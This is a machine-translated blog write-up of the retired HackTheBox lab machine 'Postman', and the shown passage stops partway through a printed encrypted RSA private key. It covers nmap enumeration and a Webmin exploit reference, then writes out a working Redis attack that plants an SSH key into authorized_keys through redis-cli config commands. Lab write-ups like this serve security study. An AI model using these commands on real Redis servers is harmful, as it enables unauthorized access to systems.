{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-postman-en","result":{"data":{"markdownRemark":{"id":"2fed0608-e99d-5101-8f23-298f2a87b5e7","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-postman\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<img src=\"http://www.hackthebox.eu/badge/image/327080\" alt=\"Hack The Box\">\n<p>This time I am writing up the retired HackTheBox machine “Postman”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#getting-a-user\">Getting a User</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.160  $RHOST/g'</span> /etc/hosts\nnmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token comment\"># All ports</span>\nnmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p><code class=\"language-text\">MiniServ 1.910</code> was an application I had never seen before.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT      STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp    <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.6p1 Ubuntu 4ubuntu0.3 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> <span class=\"token number\">46</span>:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp    <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.29 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: The Cyber Geek<span class=\"token string\">'s Personal Website\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n10000/tcp open  http    MiniServ 1.910 (Webmin httpd)\n|_http-title: Site doesn'</span>t have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">Charset</span><span class=\"token operator\">=</span>iso-8859-1<span class=\"token punctuation\">)</span>.\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>Connecting to port 80 brought up what looked like a blog site.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/94b5d500cb0fa8bf9c3d9f2544316617/8de58/image-20220809001108449.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 77.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjUlEQVQ4y4WS208TURDGF7qX7r273e5ur1AEawlShBii8cUHY2JCAoRLKwpUHhQTn/z/8/nNOdsl0Qcffpk5c2a+b3q2xmQ6w+Hrd5gdvcXLg2PsH77BdO8Ik91X2J7M/sM+dl7MFJPdA8wOj2Ek+Q7K4R7S4jna5QRZd6ryVmcbcfaMbGnaW4jaqziu0fdjtBjz3gSGG2/CT7bQcPswvb6Kq/wf3N5fdNlbPuEUMOxgAMEJR2SoCSr8AZpyx2j7fYXkDsUF2+uRLmyK2RSX3HCi0ZNYvAGbcWWyEhEsn8NCoPPV2aKIplQYIqSc6+0GutHvagElWA1KjYJ20Kt7LNmuvu/BaEYiJIKDeoPVgI5dDXMn0DXLL1VNRxLIhoUyoOBACaqfIi6VoHInJhtluNnis8RDfadqZdVTKkw3V73GalhcnJBb0MCSWtCthko04z7cZAS3JW9bKty4rzcMxTSvMURIMN0C605HOSlXuknDmt3mO+XVYAeNZsaeDOuMDVefG822qkluOHEPbjpAuTFF3BnDa/E9ox78dAQvGSDJ5c/L7dgXtYcqNsOCdf5/2StRG7VJyg3DkgJdXN084Hb5iMvFEncPP3Exv8fJ2QLvP5xgyfPp+QLzz0s8/vqN88svuLi+Zf93nJxeY7yzD6MR8Yk6IsivExRoiIuX8b1KXM7vcHpxQ8E5rhb3+PjpDGcUufv2A4uvDyoONqcUCdVWgunJhgkMk6qCVWF6mWoQtyTfQFZu8icPEaV9pDy7UVEPN5wE63bMGKuz5Ia+TCmW8UNkKurmFrwohxcXGuY+sf2UHy/iMLGCilBH1gzLly8kSCOdGC0xoeAaGzRST1SuhOwQaxRQmIJfn/8AHa+RP66fDU8AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/94b5d500cb0fa8bf9c3d9f2544316617/8ac56/image-20220809001108449.webp 240w,\n/static/94b5d500cb0fa8bf9c3d9f2544316617/d3be9/image-20220809001108449.webp 480w,\n/static/94b5d500cb0fa8bf9c3d9f2544316617/e46b2/image-20220809001108449.webp 960w,\n/static/94b5d500cb0fa8bf9c3d9f2544316617/4fba2/image-20220809001108449.webp 1219w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/94b5d500cb0fa8bf9c3d9f2544316617/8ff5a/image-20220809001108449.png 240w,\n/static/94b5d500cb0fa8bf9c3d9f2544316617/e85cb/image-20220809001108449.png 480w,\n/static/94b5d500cb0fa8bf9c3d9f2544316617/d9199/image-20220809001108449.png 960w,\n/static/94b5d500cb0fa8bf9c3d9f2544316617/8de58/image-20220809001108449.png 1219w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/94b5d500cb0fa8bf9c3d9f2544316617/d9199/image-20220809001108449.png\"\n            alt=\"image-20220809001108449\"\n            title=\"image-20220809001108449\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I checked the page source but found nothing particularly interesting, and gobuster did not turn up any useful paths either.</p>\n<p>On the other hand, Webmin 1.910 on port 10000 appeared to have an RCE vulnerability.</p>\n<p>However, exploiting this vulnerability required credentials, so I needed to find those first.</p>\n<p>Reference: <a href=\"https://github.com/roughiz/Webmin-1.910-Exploit-Script/blob/master/webmin_exploit.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Webmin-1.910-Exploit-Script/webmin_exploit.py at master · roughiz/Webmin-1.910-Exploit-Script · GitHub</a></p>\n<p>Accessing Webmin required the hostname <code class=\"language-text\">postman:10000</code>, so I updated the hosts file accordingly.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 953px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/079ee6dad0103788e2ee2afa75d60eb4/38124/image-20220809003007010.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 60.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB2UlEQVQoz5WRy27TQBSG/Q4F9SLaNFKKKtJKLLvhEVhVLACVUkRRmlYVRWy4bNsH4CWQkGADLwASElKyiJBnPGPj1HbSi3NpSHBtNWn8M+PETVtxaS198jnjc74541FGxhK4OjyG5FQaqelZJK/PYHxyCpMzt3Bj7jbSN+eQSKVxLTmN0YkUhkYmcGU08VeU+Tv3cPf+IjJrG1hdf4Yn2XVkslmsvHyDzOZHLGefYvHRYzxYWo5YWJLxAJkvPBygFAoFGIYBxpiAg3MOxnUwjYDR71Gu60ZvnfGTuhguanXRH6PkcjlQSkEIOQft08tN04Rt2yiVSnAcB46ILcuK1omq9iFQ8rk8NE37g5CAnhJ2Oh34vg/LtuC6+6hUKwjDEIEfnKlX8vmBUE56nri43W6j0TgQx9KjqYrFIprNn9EmsUzWX0gov7daLdTrdXieh2qthiAIoqllfmmhvJCakJTKZRyJSbvdMCIEIiHt/+9LTej9auGwWcPxkSc0XcSP7x+e6f2vUBU3Z+oMfKeJ529NvHhnYOuTg1fvLbz+4EAvN2BwDWq//2JHZhqcvSo+qy6+UhffmCviPXwh+3B2K6KfnvT/W0gGUiaa7B8MlmDb6L1lzk7JZP1vDUcO2z2DCEsAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/079ee6dad0103788e2ee2afa75d60eb4/8ac56/image-20220809003007010.webp 240w,\n/static/079ee6dad0103788e2ee2afa75d60eb4/d3be9/image-20220809003007010.webp 480w,\n/static/079ee6dad0103788e2ee2afa75d60eb4/5bf28/image-20220809003007010.webp 953w\"\n              sizes=\"(max-width: 953px) 100vw, 953px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/079ee6dad0103788e2ee2afa75d60eb4/8ff5a/image-20220809003007010.png 240w,\n/static/079ee6dad0103788e2ee2afa75d60eb4/e85cb/image-20220809003007010.png 480w,\n/static/079ee6dad0103788e2ee2afa75d60eb4/38124/image-20220809003007010.png 953w\"\n            sizes=\"(max-width: 953px) 100vw, 953px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/079ee6dad0103788e2ee2afa75d60eb4/38124/image-20220809003007010.png\"\n            alt=\"image-20220809003007010\"\n            title=\"image-20220809003007010\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I got somewhat stuck here, but a more detailed port scan revealed that port 6379 was also open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token number\">6379</span>/tcp  <span class=\"token function\">open</span>  redis   Redis key-value store <span class=\"token number\">4.0</span>.9</code></pre></div>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">6379 - Pentesting Redis - HackTricks</a></p>\n<p>Following that reference, I tried various approaches including reverse shells and file injection, but none of them worked cleanly.</p>\n<p>However, I ultimately succeeded in obtaining an SSH shell using the following commands:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">(</span>echo -e <span class=\"token string\">\"<span class=\"token entity\" title=\"\\n\">\\n</span><span class=\"token entity\" title=\"\\n\">\\n</span>\"</span><span class=\"token punctuation\">;</span> <span class=\"token function\">cat</span> id_rsa.pub<span class=\"token punctuation\">;</span> <span class=\"token builtin class-name\">echo</span> -e <span class=\"token string\">\"<span class=\"token entity\" title=\"\\n\">\\n</span><span class=\"token entity\" title=\"\\n\">\\n</span>\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> temp.txt\n<span class=\"token function\">cat</span> temp.txt <span class=\"token operator\">|</span> redis-cli -h <span class=\"token number\">10.10</span>.10.160 -x <span class=\"token builtin class-name\">set</span> ssh_key\nredis-cli -h <span class=\"token number\">10.10</span>.10.160\nconfig <span class=\"token builtin class-name\">set</span> <span class=\"token function\">dir</span> /var/lib/redis/.ssh\nconfig <span class=\"token builtin class-name\">set</span> dbfilename <span class=\"token string\">\"authorized_keys\"</span>\nsave</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 831px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ac2fcc6c6aec195646dc4be47fdb1adc/5b4a1/image-20220809232943949.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVQoz2WP/XKCMBDEeZJa6yj5BEQSQCAILcWZvv/zbC+hMlL/+M3d7O1tLlHMU5xYEjgyHer+wPG2j7H7YHin3tcTz5CeK0h9gUpN6JPMQp9LJHmFWOTYHQSicfpBP97R3b5xdV9w44y6HVGUDqbuwwKTOeruE25YZh5TObS3aaGf0NBubltE831G1zs0TYNr26LtOhhbojCGsMhyuihJg1ZWNQprg34paE7a4l2q90ada1CWljAYhh5KKXDOwDinbzBwISCUBBP8hZh8cfD+VdIiQQtSyoAPe/TSB1OQD/N6QOuF//0T0RpA+PD1AR8oxTZQaWi95SVwc9UzIZAe8ZdL9bK44mcPD/ELwaTZr2vYzPQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ac2fcc6c6aec195646dc4be47fdb1adc/8ac56/image-20220809232943949.webp 240w,\n/static/ac2fcc6c6aec195646dc4be47fdb1adc/d3be9/image-20220809232943949.webp 480w,\n/static/ac2fcc6c6aec195646dc4be47fdb1adc/6d405/image-20220809232943949.webp 831w\"\n              sizes=\"(max-width: 831px) 100vw, 831px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ac2fcc6c6aec195646dc4be47fdb1adc/8ff5a/image-20220809232943949.png 240w,\n/static/ac2fcc6c6aec195646dc4be47fdb1adc/e85cb/image-20220809232943949.png 480w,\n/static/ac2fcc6c6aec195646dc4be47fdb1adc/5b4a1/image-20220809232943949.png 831w\"\n            sizes=\"(max-width: 831px) 100vw, 831px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ac2fcc6c6aec195646dc4be47fdb1adc/5b4a1/image-20220809232943949.png\"\n            alt=\"image-20220809232943949\"\n            title=\"image-20220809232943949\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"getting-a-user\" style=\"position:relative;\"><a href=\"#getting-a-user\" aria-label=\"getting a user permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Getting a User</h2>\n<p>With a shell obtained as the redis user, I next aimed to get the User flag.</p>\n<p>The username turned out to be Matt.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 623px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5ef93dc323e438d456dbaed456a00191/6114d/image-20220809233022889.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 104.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAADEElEQVQ4y22UaXKjUAyEOc0kZrGDwawGbINxZu5/H01/epBKzeSHCh6L1OpuKaqbysbxav21U7RW1xcbht7atrY8z+1yKa0oCzsksUeSJJakiaVp+kMkFnVd4z+dz7nF8fbDt8iyzJIstYM+jtNw3iNNs/+SRrf7ZFeha4SoKM5CWH1F09T2eNysVdGmq+0spHd9vxcPSf9JOM93tdx7y5WS3B+TjdOgRJM/e70Wm26DjYqL6Hg+HwYICnoS0KYBLQWiXNVARntxHLhJknS7bmcF7cbb+XQ6KY4/8hg95pvdbqOVaocHx+PRY+eJ+/SYeUK4JNnO7/dEDiKBQ7XS9414aiWOFKb9vhWvvcek9gdFWZXe8k1UgPQ9PoQ4HFx9nhHRfRMFm5RSexVH8Dgvd7vKPnTwFI+13iPO6zW7WPDcqfCk7s7nc7ASHOLDqrqIx8LOBSqO+vjq3qQAwlCAhJW+fQhA2za2PGd1E/x7+jhZtlEVLUJEiySlZRCgPAjHcXCE6+diHV30AWErhL//rC7mbh+3EAiBTMIwEaUjZFKG4Ro4FMffEU56X4lLnoHMOYzhMHbhomka5avROolSCiEcggqUoHaEr4CwUWHnUwjXz6c/O+Uf9lHkckLq4kT9tykpNg5BCI9YadiEaSRIpUR33aM251yJCnWGAzL50hPiQW9JzqfldX34uM36keXA+1W80XI3BIEQA6oAgun3tvFmRCJsw0eN1MN3WALuuo3b5zpbr2SguqsYLS/r4mixFudefDPr0b4QaK3xF1pjfedFCEYMNI5wsxDjyrNBtPAt/yAW7Uf7VslFLmhSwX57e1e8+fWgdn6963wgwmTQJi0GdRNdmZxw77MMZ1TC8SzY8lK4IKB3O+mMmgSCHDaLxMyw5jvOtivLIZDcO8FMxiJDM9+sKGhAnFlWomViEZ8+Ga5qQBa2eeLxZWx4qH2hTu7L2zaCvhPluR7yJcpDBQEBZ0dtHopgGwS56BrRGqbelwRq+1LgJyHNtLqgpVVRRo9pwQWozXcA8vHV/VGo/wIvIqy1yWZZAwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5ef93dc323e438d456dbaed456a00191/8ac56/image-20220809233022889.webp 240w,\n/static/5ef93dc323e438d456dbaed456a00191/d3be9/image-20220809233022889.webp 480w,\n/static/5ef93dc323e438d456dbaed456a00191/7ac29/image-20220809233022889.webp 623w\"\n              sizes=\"(max-width: 623px) 100vw, 623px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5ef93dc323e438d456dbaed456a00191/8ff5a/image-20220809233022889.png 240w,\n/static/5ef93dc323e438d456dbaed456a00191/e85cb/image-20220809233022889.png 480w,\n/static/5ef93dc323e438d456dbaed456a00191/6114d/image-20220809233022889.png 623w\"\n            sizes=\"(max-width: 623px) 100vw, 623px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5ef93dc323e438d456dbaed456a00191/6114d/image-20220809233022889.png\"\n            alt=\"image-20220809233022889\"\n            title=\"image-20220809233022889\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Checking the shell history showed various operations being performed under Matt’s account.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">redis@Postman:~$ <span class=\"token function\">history</span>\n    <span class=\"token number\">1</span>  <span class=\"token builtin class-name\">exit</span>\n    <span class=\"token number\">2</span>  <span class=\"token function\">su</span> Matt\n    <span class=\"token number\">3</span>  <span class=\"token builtin class-name\">pwd</span>\n    <span class=\"token number\">4</span>  <span class=\"token function\">nano</span> scan.py\n    <span class=\"token number\">5</span>  python scan.py\n    <span class=\"token number\">6</span>  <span class=\"token function\">nano</span> scan.py\n    <span class=\"token number\">7</span>  <span class=\"token function\">clear</span>\n    <span class=\"token number\">8</span>  <span class=\"token function\">nano</span> scan.py\n    <span class=\"token number\">9</span>  <span class=\"token function\">clear</span>\n   <span class=\"token number\">10</span>  python scan.py\n   <span class=\"token number\">11</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">12</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">13</span>  <span class=\"token function\">cat</span> /etc/ssh/sshd_config \n   <span class=\"token number\">14</span>  <span class=\"token function\">su</span> Matt\n   <span class=\"token number\">15</span>  <span class=\"token function\">clear</span>\n   <span class=\"token number\">16</span>  <span class=\"token builtin class-name\">cd</span> /var/lib/redis\n   <span class=\"token number\">17</span>  <span class=\"token function\">su</span> Matt\n   <span class=\"token number\">18</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">19</span>  <span class=\"token function\">cat</span> id_rsa.bak \n   <span class=\"token number\">20</span>  <span class=\"token function\">ls</span> -la\n   <span class=\"token number\">21</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">22</span>  <span class=\"token function\">cat</span> id_rsa.bak \n   <span class=\"token number\">23</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">24</span>  <span class=\"token function\">ls</span> -la\n   <span class=\"token number\">25</span>  <span class=\"token function\">crontab</span> -l\n   <span class=\"token number\">26</span>  systemctl <span class=\"token builtin class-name\">enable</span> redis-server\n   <span class=\"token number\">27</span>  redis-server\n   <span class=\"token number\">28</span>  <span class=\"token function\">ifconfig</span>\n   <span class=\"token number\">29</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">30</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">31</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">32</span>  <span class=\"token function\">netstat</span> -a\n   <span class=\"token number\">33</span>  <span class=\"token function\">netstat</span> -a <span class=\"token operator\">></span> txt\n   <span class=\"token number\">34</span>  <span class=\"token builtin class-name\">exit</span>\n   <span class=\"token number\">35</span>  <span class=\"token function\">crontab</span> -l\n   <span class=\"token number\">36</span>  <span class=\"token builtin class-name\">cd</span> ~/\n   <span class=\"token number\">37</span>  <span class=\"token function\">ls</span>\n   <span class=\"token number\">38</span>  <span class=\"token function\">nano</span> <span class=\"token number\">6379</span>\n   <span class=\"token number\">39</span>  <span class=\"token builtin class-name\">exit</span></code></pre></div>\n<p>There are various things worth investigating, but first I looked at <code class=\"language-text\">id_rsa.bak</code>.</p>\n<p>Opening the file revealed an encrypted private key.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">-----BEGIN RSA PRIVATE KEY-----\nProc-Type: <span class=\"token number\">4</span>,ENCRYPTED\nDEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C\n\nJehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX\ncwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2\n7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6\ncdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9\n1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv\nEyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP\nUH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY\nSj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK\nt+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS\n5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke\nP2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6\njKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge\nSbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i\nl3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X\n0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p\nS9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR\nhkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+\nZxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V\nXTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD\nb6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi\nWhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggC